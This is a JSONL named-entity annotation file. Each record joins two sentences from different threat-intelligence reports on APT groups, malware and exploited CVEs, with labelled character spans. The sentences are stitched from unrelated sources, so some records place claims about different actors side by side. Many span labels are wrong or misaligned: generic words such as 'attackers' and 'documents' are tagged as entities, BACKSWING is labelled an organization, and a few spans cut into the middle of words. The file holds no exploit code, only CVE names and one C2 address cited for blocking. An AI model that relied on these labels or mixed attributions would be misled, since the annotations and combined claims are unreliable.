{"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": [{"start": 54, "end": 64, "label": "System"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 139, "end": 148, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 161, "end": 169, "label": "Malware"}, {"start": 183, "end": 190, "label": "Vulnerability"}, {"start": 205, "end": 216, "label": "Vulnerability"}, {"start": 246, "end": 260, "label": "Organization"}]}
{"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 132, "end": 148, "label": "Malware"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 203, "end": 208, "label": "System"}, {"start": 209, "end": 224, "label": "Vulnerability"}]}
{"text": "The Word document usually exploits CVE-2012-0158 . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 73, "end": 78, "label": "System"}, {"start": 79, "end": 86, "label": "Vulnerability"}, {"start": 130, "end": 144, "label": "Organization"}]}
{"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 32, "end": 54, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 103, "end": 124, "label": "Malware"}, {"start": 151, "end": 159, "label": "Malware"}, {"start": 204, "end": 215, "label": "Vulnerability"}, {"start": 216, "end": 221, "label": "System"}, {"start": 222, "end": 229, "label": "Vulnerability"}]}
{"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 28, "end": 50, "label": "Malware"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 92, "end": 101, "label": "Organization"}, {"start": 116, "end": 123, "label": "Vulnerability"}, {"start": 216, "end": 219, "label": "System"}, {"start": 220, "end": 235, "label": "Vulnerability"}, {"start": 249, "end": 258, "label": "Organization"}]}
{"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 126, "end": 139, "label": "Organization"}, {"start": 259, "end": 270, "label": "Vulnerability"}, {"start": 271, "end": 279, "label": "Vulnerability"}, {"start": 393, "end": 398, "label": "Malware"}, {"start": 401, "end": 409, "label": "Malware"}]}
{"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": [{"start": 29, "end": 36, "label": "Organization"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 197, "end": 206, "label": "Organization"}, {"start": 211, "end": 222, "label": "Vulnerability"}]}
{"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": [{"start": 40, "end": 57, "label": "Organization"}, {"start": 86, "end": 116, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 212, "end": 221, "label": "Organization"}, {"start": 238, "end": 262, "label": "Vulnerability"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 309, "end": 311, "label": "Indicator"}]}
{"text": "This threat group uses a first-stage malware known as Backdoor.APT.Pgift ( aka Troj/ReRol.A ) , which is dropped via malicious documents and connects back to a C2 server . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 54, "end": 72, "label": "Malware"}, {"start": 198, "end": 211, "label": "Vulnerability"}]}
{"text": "Backdoor.APT.PittyTiger1.3 ( aka CT RAT ) \u2013 This malware is likely used as a second-stage backdoor . Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": [{"start": 0, "end": 26, "label": "Malware"}, {"start": 33, "end": 39, "label": "System"}, {"start": 77, "end": 98, "label": "System"}, {"start": 113, "end": 122, "label": "Indicator"}, {"start": 133, "end": 146, "label": "Vulnerability"}]}
{"text": "We have observed the Enfal malware in use since 2011 and in conjunction with Backdoor.APT.Pgift as the payload of a malicious document used in spearphishing attacks . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": [{"start": 21, "end": 34, "label": "System"}, {"start": 77, "end": 95, "label": "Malware"}, {"start": 226, "end": 239, "label": "Vulnerability"}]}
{"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack .", "spans": [{"start": 46, "end": 61, "label": "System"}, {"start": 76, "end": 91, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 297, "end": 316, "label": "Organization"}, {"start": 354, "end": 362, "label": "Vulnerability"}]}
{"text": "In one case from 2013 , the target was sent a malicious document through a spear phishing email message . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": [{"start": 46, "end": 64, "label": "Malware"}, {"start": 147, "end": 150, "label": "System"}, {"start": 151, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 180, "label": "System"}, {"start": 181, "end": 189, "label": "Vulnerability"}, {"start": 207, "end": 220, "label": "Vulnerability"}, {"start": 221, "end": 225, "label": "System"}, {"start": 226, "end": 234, "label": "Vulnerability"}, {"start": 281, "end": 294, "label": "Malware"}]}
{"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": [{"start": 49, "end": 62, "label": "Malware"}, {"start": 192, "end": 210, "label": "Malware"}, {"start": 214, "end": 232, "label": "Malware"}, {"start": 257, "end": 262, "label": "Organization"}, {"start": 302, "end": 315, "label": "Vulnerability"}, {"start": 339, "end": 352, "label": "Organization"}]}
{"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": [{"start": 32, "end": 40, "label": "Organization"}, {"start": 77, "end": 95, "label": "System"}, {"start": 99, "end": 122, "label": "System"}, {"start": 125, "end": 135, "label": "Malware"}, {"start": 242, "end": 244, "label": "System"}, {"start": 308, "end": 317, "label": "Organization"}, {"start": 379, "end": 393, "label": "Vulnerability"}]}
{"text": "The two executables related to Hermes are bitsran.exe and RSW7B37.tmp . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 42, "end": 53, "label": "Malware"}, {"start": 58, "end": 69, "label": "Malware"}, {"start": 76, "end": 82, "label": "Organization"}, {"start": 96, "end": 103, "label": "Vulnerability"}, {"start": 104, "end": 117, "label": "Vulnerability"}, {"start": 202, "end": 208, "label": "Malware"}, {"start": 216, "end": 224, "label": "Malware"}]}
{"text": "Proofpoint researchers have observed a well-known Russian-speaking APT actor usually referred to as Turla using a new .NET/MSIL dropper for an existing backdoor called JS/KopiLuwak . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 100, "end": 105, "label": "Organization"}, {"start": 128, "end": 135, "label": "System"}, {"start": 168, "end": 180, "label": "Malware"}, {"start": 204, "end": 228, "label": "Indicator"}, {"start": 245, "end": 252, "label": "Vulnerability"}, {"start": 257, "end": 264, "label": "System"}, {"start": 265, "end": 307, "label": "System"}, {"start": 308, "end": 321, "label": "Vulnerability"}, {"start": 333, "end": 346, "label": "Vulnerability"}]}
{"text": "However , over the last nine campaigns since Trend Micro\u2018s June report , TA505 also started using .ISO image attachments as the point of entry , as well as a .NET downloader , a new style for macro delivery , a newer version of ServHelper , and a .DLL variant of FlawedAmmyy downloader . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": [{"start": 45, "end": 58, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 158, "end": 173, "label": "System"}, {"start": 228, "end": 238, "label": "System"}, {"start": 247, "end": 259, "label": "Malware"}, {"start": 288, "end": 301, "label": "Organization"}, {"start": 315, "end": 322, "label": "Vulnerability"}, {"start": 323, "end": 336, "label": "Vulnerability"}]}
{"text": "The first part of the campaign From Jan. 23 , 2018 , to Feb. 26 , 2018 used a macro-based document that dropped a VBS file and an INI file . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": [{"start": 114, "end": 122, "label": "Malware"}, {"start": 130, "end": 138, "label": "Malware"}, {"start": 141, "end": 154, "label": "Organization"}, {"start": 173, "end": 180, "label": "Vulnerability"}, {"start": 181, "end": 194, "label": "Vulnerability"}, {"start": 227, "end": 242, "label": "Malware"}]}
{"text": "The INI file contains the Base64 encoded PowerShell command , which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 100, "end": 110, "label": "System"}, {"start": 151, "end": 159, "label": "Malware"}, {"start": 179, "end": 190, "label": "Malware"}, {"start": 193, "end": 201, "label": "Malware"}, {"start": 234, "end": 242, "label": "Indicator"}, {"start": 258, "end": 271, "label": "Vulnerability"}]}
{"text": "cmstp.exe system restart , cmstp.exe will be used to execute the SCT file indirectly through the INF file . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 27, "end": 36, "label": "Malware"}, {"start": 65, "end": 73, "label": "Malware"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 147, "end": 163, "label": "System"}, {"start": 178, "end": 192, "label": "Vulnerability"}, {"start": 203, "end": 211, "label": "Malware"}, {"start": 216, "end": 227, "label": "Malware"}, {"start": 251, "end": 260, "label": "Organization"}]}
{"text": "The following are the three files:Defender.sct \u2013 The malicious JavaScript based scriptlet file . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 28, "end": 46, "label": "Malware"}, {"start": 80, "end": 89, "label": "Malware"}, {"start": 90, "end": 94, "label": "Malware"}, {"start": 97, "end": 101, "label": "Malware"}, {"start": 175, "end": 190, "label": "Organization"}, {"start": 193, "end": 212, "label": "Organization"}, {"start": 215, "end": 234, "label": "Organization"}, {"start": 305, "end": 314, "label": "Organization"}, {"start": 322, "end": 330, "label": "Vulnerability"}, {"start": 363, "end": 367, "label": "Malware"}]}
{"text": "After all network derived IPs have been processed , the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 118, "end": 128, "label": "Malware"}, {"start": 133, "end": 144, "label": "Malware"}, {"start": 186, "end": 190, "label": "Malware"}, {"start": 212, "end": 220, "label": "Vulnerability"}, {"start": 221, "end": 228, "label": "Vulnerability"}]}
{"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": [{"start": 4, "end": 18, "label": "Malware"}, {"start": 48, "end": 63, "label": "Vulnerability"}, {"start": 168, "end": 181, "label": "Malware"}, {"start": 184, "end": 197, "label": "Vulnerability"}, {"start": 198, "end": 205, "label": "Vulnerability"}]}
{"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 135, "end": 148, "label": "Indicator"}, {"start": 198, "end": 202, "label": "System"}, {"start": 232, "end": 245, "label": "Vulnerability"}, {"start": 246, "end": 253, "label": "Vulnerability"}]}
{"text": "This file is decrypted and injected into an instance of InstallUtiil.exe , and functions as a Tor anonymizer . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": [{"start": 56, "end": 72, "label": "Malware"}, {"start": 94, "end": 97, "label": "Malware"}, {"start": 98, "end": 108, "label": "Malware"}, {"start": 111, "end": 121, "label": "Organization"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 202, "end": 207, "label": "System"}]}
{"text": "Along with the executable , two binary files , inject.bin (malicious function code) and imain.bin (malicious control logic) , were deployed as the controller\u2019s payload . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": [{"start": 32, "end": 44, "label": "Malware"}, {"start": 88, "end": 97, "label": "Malware"}, {"start": 170, "end": 180, "label": "Organization"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 207, "end": 215, "label": "Vulnerability"}, {"start": 216, "end": 223, "label": "Vulnerability"}]}
{"text": "This isn\u2019t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": [{"start": 26, "end": 28, "label": "Malware"}, {"start": 111, "end": 137, "label": "Malware"}, {"start": 142, "end": 162, "label": "Malware"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 200, "end": 213, "label": "Vulnerability"}, {"start": 214, "end": 221, "label": "Vulnerability"}, {"start": 232, "end": 242, "label": "Organization"}]}
{"text": "During our investigation into the activity , FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we\u2019ve been tracking as BACKSWING . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": [{"start": 45, "end": 52, "label": "Organization"}, {"start": 89, "end": 98, "label": "Malware"}, {"start": 166, "end": 175, "label": "System"}, {"start": 217, "end": 232, "label": "Organization"}, {"start": 235, "end": 245, "label": "Organization"}, {"start": 250, "end": 259, "label": "Organization"}, {"start": 318, "end": 325, "label": "Vulnerability"}, {"start": 326, "end": 333, "label": "Vulnerability"}]}
{"text": "Incident Background Beginning on Oct. 24 at 08:00 UTC , FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update (install_flash_player.exe) that delivered a wormable variant of ransomware . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 56, "end": 63, "label": "Organization"}, {"start": 177, "end": 203, "label": "Malware"}, {"start": 241, "end": 251, "label": "Malware"}, {"start": 314, "end": 324, "label": "Organization"}, {"start": 327, "end": 336, "label": "Organization"}, {"start": 370, "end": 388, "label": "System"}, {"start": 389, "end": 397, "label": "Vulnerability"}, {"start": 414, "end": 427, "label": "Vulnerability"}, {"start": 474, "end": 480, "label": "Malware"}]}
{"text": "Figure 3: BACKSWING Version 2Version 1:FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 .", "spans": [{"start": 37, "end": 46, "label": "Organization"}, {"start": 77, "end": 86, "label": "Malware"}, {"start": 142, "end": 166, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 236, "end": 245, "label": "Organization"}, {"start": 271, "end": 279, "label": "Vulnerability"}, {"start": 280, "end": 287, "label": "Vulnerability"}, {"start": 296, "end": 306, "label": "Organization"}]}
{"text": "While FireEye has not directly observed BACKSWING delivering BADRABBIT , BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol.com , which hosted the BADRABBIT dropper . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": [{"start": 6, "end": 13, "label": "Organization"}, {"start": 40, "end": 49, "label": "Organization"}, {"start": 61, "end": 70, "label": "Malware"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 142, "end": 149, "label": "Organization"}, {"start": 198, "end": 215, "label": "Malware"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 270, "end": 284, "label": "Vulnerability"}, {"start": 305, "end": 312, "label": "Organization"}, {"start": 325, "end": 333, "label": "Organization"}, {"start": 343, "end": 350, "label": "Vulnerability"}, {"start": 359, "end": 375, "label": "System"}, {"start": 402, "end": 425, "label": "Organization"}]}
{"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": [{"start": 46, "end": 54, "label": "Malware"}, {"start": 168, "end": 177, "label": "Indicator"}, {"start": 193, "end": 206, "label": "Vulnerability"}]}
{"text": "Like EternalPetya , infpub.dat determines if a specific file exists on the system and will exit if found . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": [{"start": 20, "end": 30, "label": "Malware"}, {"start": 47, "end": 60, "label": "Malware"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 160, "end": 176, "label": "System"}, {"start": 191, "end": 205, "label": "Vulnerability"}, {"start": 216, "end": 224, "label": "Malware"}, {"start": 229, "end": 240, "label": "Malware"}]}
{"text": "This entry was posted on Mon Dec 04 12:00 EST 2017 and filed under Code , Reverse Engineering , Nick Harbour , and Incident Response . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": [{"start": 5, "end": 10, "label": "Malware"}, {"start": 74, "end": 93, "label": "System"}, {"start": 96, "end": 108, "label": "System"}, {"start": 164, "end": 169, "label": "Organization"}, {"start": 260, "end": 273, "label": "Vulnerability"}, {"start": 278, "end": 292, "label": "Vulnerability"}]}
{"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 286, "end": 302, "label": "System"}, {"start": 317, "end": 331, "label": "Vulnerability"}, {"start": 342, "end": 350, "label": "Malware"}, {"start": 355, "end": 366, "label": "Malware"}, {"start": 390, "end": 399, "label": "Organization"}]}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}, {"start": 251, "end": 259, "label": "Malware"}, {"start": 282, "end": 295, "label": "Malware"}, {"start": 316, "end": 329, "label": "Vulnerability"}]}
{"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 119, "end": 158, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 248, "end": 255, "label": "Vulnerability"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 274, "end": 281, "label": "System"}, {"start": 282, "end": 307, "label": "System"}, {"start": 308, "end": 321, "label": "Vulnerability"}, {"start": 324, "end": 337, "label": "Vulnerability"}, {"start": 377, "end": 386, "label": "Organization"}, {"start": 387, "end": 394, "label": "System"}]}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 307, "end": 313, "label": "System"}, {"start": 321, "end": 346, "label": "Indicator"}, {"start": 379, "end": 392, "label": "Vulnerability"}, {"start": 407, "end": 419, "label": "Malware"}, {"start": 451, "end": 477, "label": "Malware"}, {"start": 480, "end": 483, "label": "Malware"}]}
{"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 7, "end": 15, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 248, "end": 254, "label": "System"}, {"start": 262, "end": 287, "label": "Indicator"}, {"start": 320, "end": 333, "label": "Vulnerability"}, {"start": 348, "end": 360, "label": "Malware"}, {"start": 392, "end": 418, "label": "Malware"}, {"start": 421, "end": 424, "label": "Malware"}]}
{"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": [{"start": 9, "end": 18, "label": "Organization"}, {"start": 45, "end": 54, "label": "Malware"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 168, "end": 181, "label": "Indicator"}, {"start": 191, "end": 198, "label": "Vulnerability"}, {"start": 201, "end": 210, "label": "Organization"}, {"start": 211, "end": 226, "label": "System"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 243, "end": 256, "label": "Vulnerability"}]}
{"text": "The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": [{"start": 27, "end": 40, "label": "Vulnerability"}, {"start": 71, "end": 87, "label": "System"}, {"start": 90, "end": 93, "label": "Malware"}, {"start": 223, "end": 232, "label": "Malware"}, {"start": 235, "end": 242, "label": "Organization"}, {"start": 291, "end": 294, "label": "Organization"}, {"start": 349, "end": 357, "label": "Vulnerability"}]}
{"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . TG-3390 actors have used Java exploits in their SWCs .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 137, "label": "Malware"}, {"start": 140, "end": 167, "label": "Malware"}, {"start": 170, "end": 177, "label": "Organization"}, {"start": 195, "end": 199, "label": "System"}, {"start": 218, "end": 222, "label": "Malware"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 175, "end": 182, "label": "Organization"}, {"start": 197, "end": 210, "label": "Vulnerability"}, {"start": 278, "end": 298, "label": "Malware"}, {"start": 305, "end": 318, "label": "Vulnerability"}, {"start": 340, "end": 345, "label": "Malware"}, {"start": 446, "end": 453, "label": "Vulnerability"}]}
{"text": "CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 49, "end": 69, "label": "Malware"}, {"start": 74, "end": 93, "label": "Malware"}, {"start": 208, "end": 221, "label": "Vulnerability"}, {"start": 289, "end": 309, "label": "Malware"}, {"start": 316, "end": 329, "label": "Vulnerability"}, {"start": 351, "end": 356, "label": "Malware"}, {"start": 457, "end": 464, "label": "Vulnerability"}]}
{"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 28, "end": 41, "label": "Vulnerability"}, {"start": 45, "end": 57, "label": "Malware"}]}
{"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack .", "spans": [{"start": 146, "end": 152, "label": "Malware"}, {"start": 172, "end": 186, "label": "Vulnerability"}, {"start": 190, "end": 203, "label": "Vulnerability"}, {"start": 271, "end": 285, "label": "Vulnerability"}, {"start": 288, "end": 320, "label": "Malware"}]}
{"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": [{"start": 52, "end": 61, "label": "Malware"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 202, "end": 218, "label": "System"}, {"start": 235, "end": 249, "label": "Vulnerability"}]}
